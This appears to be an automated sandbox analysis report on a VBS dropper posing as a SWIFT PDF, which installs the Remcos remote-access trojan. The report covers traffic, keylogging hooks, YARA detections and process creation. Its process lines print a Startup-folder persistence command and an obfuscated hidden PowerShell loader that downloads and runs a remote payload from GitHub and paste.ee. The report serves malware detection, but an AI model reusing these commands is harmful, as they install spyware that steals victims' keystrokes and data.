            Source: unknownNetwork traffic detected: HTTP traffic on port 55564 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55398 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55465
            Source: unknownNetwork traffic detected: HTTP traffic on port 55541 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55586
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55466
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55467
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55589
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55593
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55473
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55474
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55475
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55590
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55470
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55591
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55471
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55592
            Source: unknownNetwork traffic detected: HTTP traffic on port 55609 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55771 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55467 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55897 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55477
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55478
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55599
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55483
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55484
            Source: unknownNetwork traffic detected: HTTP traffic on port 55518 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55485
            Source: unknownNetwork traffic detected: HTTP traffic on port 55415 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55948 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55481
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55482
            Source: unknownNetwork traffic detected: HTTP traffic on port 55552 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55478 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55810 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55632 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55494
            Source: unknownNetwork traffic detected: HTTP traffic on port 55867 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55495
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55496
            Source: unknownNetwork traffic detected: HTTP traffic on port 55414 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55497
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55491
            Source: unknownNetwork traffic detected: HTTP traffic on port 55706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55492
            Source: unknownNetwork traffic detected: HTTP traffic on port 55456 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55437 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55811 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55530 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55448 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55586 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55610 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55822 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55499
            Source: unknownNetwork traffic detected: HTTP traffic on port 55399 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55575 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55403 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55793 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55429
            Source: unknown HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:49705 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:49706 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:49707 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49718 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:55748 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_00409340 SetWindowsHookExA 0000000D,0040932C,00000000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_00409468 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx

            E-Banking Fraud

            Source: Yara match File source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 8.2.powershell.exe.180e9fef678.1.unpack, type: UNPACKEDPE
            Source: Yara match File source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 8.2.powershell.exe.180e9fef678.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 10.2.AddInProcess32.exe.1587080.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000A.00000002.3370133817.000000000323F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000A.00000002.3365846362.0000000001568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.2350319452.00000180E9BA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.2350319452.00000180E8AFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: powershell.exe PID: 7136, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: AddInProcess32.exe PID: 1988, type: MEMORYSTR
            Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

            Spam, unwanted Advertisements and Ransom Demands

            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_0041A76C SystemParametersInfoW
            Source: chrome.exe Process created: 50

            System Summary

            Source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
            Source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 8.2.powershell.exe.180e9fef678.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 8.2.powershell.exe.180e9fef678.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
            Source: 8.2.powershell.exe.180e9fef678.1.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
            Source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 8.2.powershell.exe.180e9fef678.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 8.2.powershell.exe.180e9fef678.1.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
            Source: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 00000008.00000002.2350319452.00000180E9BA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000008.00000002.2350319452.00000180E8AFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: powershell.exe PID: 1396, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 7136, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: powershell.exe PID: 7136, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: AddInProcess32.exe PID: 1988, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
            Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')')
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')')
            Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_0041642D GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_00414DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress
            Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00402073 appears 50 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00432B90 appears 53 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00432525 appears 41 times
            Source: SWIFT 103 202406111301435660 110624-pdf.vbsInitial sample: Strings found which are bigger than 50
            Source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 8.2.powershell.exe.180e9fef678.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 8.2.powershell.exe.180e9fef678.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 8.2.powershell.exe.180e9fef678.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 8.2.powershell.exe.180e9fef678.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 8.2.powershell.exe.180e9fef678.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 00000008.00000002.2350319452.00000180E9BA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000008.00000002.2350319452.00000180E8AFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: powershell.exe PID: 1396, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 7136, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: powershell.exe PID: 7136, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: AddInProcess32.exe PID: 1988, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winVBS@257/82@15/11
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_0040E2E7 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_00419493 FindResourceA,LoadResource,LockResource,SizeofResource
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8572:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6584:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7332:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8272:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2504:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5384:120:WilError_03
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutant created: \Sessions\1\BaseNamedObjects\Chrorne-K04X5E
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3136:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8936:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7080:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1892:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8904:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2316:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5024:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3236:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kveck0rz.0zi.ps1
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SWIFT 103 202406111301435660 110624-pdf.vbs"
            Source: C:\Windows\System32\wscript.exe File read: C:\Users\desktop.ini
            Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: SWIFT 103 202406111301435660 110624-pdf.vbs Virustotal: Detection: 8%
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')')
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&((vARiabLe '*MdR*').name[3,11,2]-JOin'') ( ('u'+'0Du'+'rl'+' = J'+'huhttps'+':/'+'/ra'+'w.gi'+'thub'+'use'+'rcontent'+'.'+'co'+'m/NoDetectO'+'n/'+'NoDete'+'c'+'tOn/'+'ref'+'s'+'/h'+'ea'+'ds/main'+'/'+'DetahNo'+'th-V.tx'+'tJ'+'hu; u0Db'+'ase64Conte'+'nt = '+'(New-Obje'+'ct Sys'+'tem.Net.Web'+'Cli'+'e'+'nt)'+'.DownloadSt'+'r'+'ing(u0D'+'url); u0'+'Dbi'+'na'+'r'+'yContent'+' = [Sys'+'t'+'e'+'m.'+'Co'+'n'+'v'+'e'+'r'+'t]'+'::F'+'romBase64Stri'+'ng'+'(u0Dbase'+'64Conte'+'nt); '+'u'+'0Dass'+'embly'+' = [Refl'+'ec'+'tion.A'+'ssemb'+'l'+'y]'+'::L'+'oa'+'d'+'('+'u0'+'Db'+'in'+'a'+'ryC'+'ont'+'ent)'+'; [dnlib.I'+'O'+'.Ho'+'me]::VA'+'I'+'(d6g0'+'/'+'O'+'YU'+'lX/d/ee'+'.etsap//:sp'+'tthd'+'6'+'g, d'+'6gdesa'+'t'+'iv'+'a'+'dod6g'+', d'+'6g'+'de'+'sat'+'iv'+'ado'+'d6'+'g, '+'d6gdes'+'ativadod6g'+', d'+'6'+'gAddI'+'n'+'Pr'+'oces'+'s32'+'d6g, d6'+'gd6g'+',d'+'6gd6'+'g)').rEplACe('u0D','$').rEplACe(([cHaR]74+[cHaR]104+[cHaR]117),[STrIng][cHaR]39).rEplACe('d6g',[STrIng][cHaR]34))"
